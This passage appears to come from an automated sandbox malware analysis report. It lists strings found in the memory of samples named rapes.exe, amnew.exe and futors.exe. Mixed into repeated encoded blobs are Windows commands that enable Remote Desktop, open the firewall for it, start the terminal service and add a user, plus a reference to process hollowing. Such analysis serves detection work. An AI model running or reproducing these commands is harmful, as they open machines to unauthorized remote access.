bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: amnew.exe, 00000029.00000002.1626859136.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: net start termservice
Source: amnew.exe, 00000029.00000002.1626859136.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: amnew.exe, 00000029.00000002.1629365028.0000000004440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: amnew.exe, 00000029.00000002.1629365028.0000000004440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rmservice start= autonet start termservice" /add /t]
Source: amnew.exe, 00000029.00000000.1612265793.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: net start termservice
Source: amnew.exe, 00000029.00000000.1612265793.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002A.00000002.1629982840.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002A.00000002.1629982840.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ 